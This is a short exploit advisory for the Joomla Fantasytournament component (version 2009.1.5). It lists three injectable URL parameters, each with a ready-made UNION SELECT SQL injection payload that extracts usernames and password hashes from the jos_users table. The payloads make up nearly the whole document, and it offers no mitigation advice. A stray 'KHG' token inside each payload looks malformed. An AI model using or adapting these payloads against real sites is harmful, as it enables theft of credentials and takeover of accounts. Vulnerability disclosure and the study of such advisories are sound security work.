The Joomla Fantasytournament component suffers from multiple remote SQL injection vulnerabilities.
09f2414d8a5d52435a8ccd8239ace69f3c633ca42187125aa7d0e39b771d7937
#############################################################################
# #
# Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Fantasytournament (com_fantasytournament)"
[~] Version: "2009.1.5"
[~] Date: "01/01/2009"
[~] Author: "Adrian Gray"
[~] Author E-mail: "a.gray@javalamp.co.uk"
[~] Author URL: "www.graymoose.com"
[~] Component info: "http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details"
########################################
[~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL]
[~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
########################################
[~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL]
[~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
########################################
[~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL]
[~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
########################################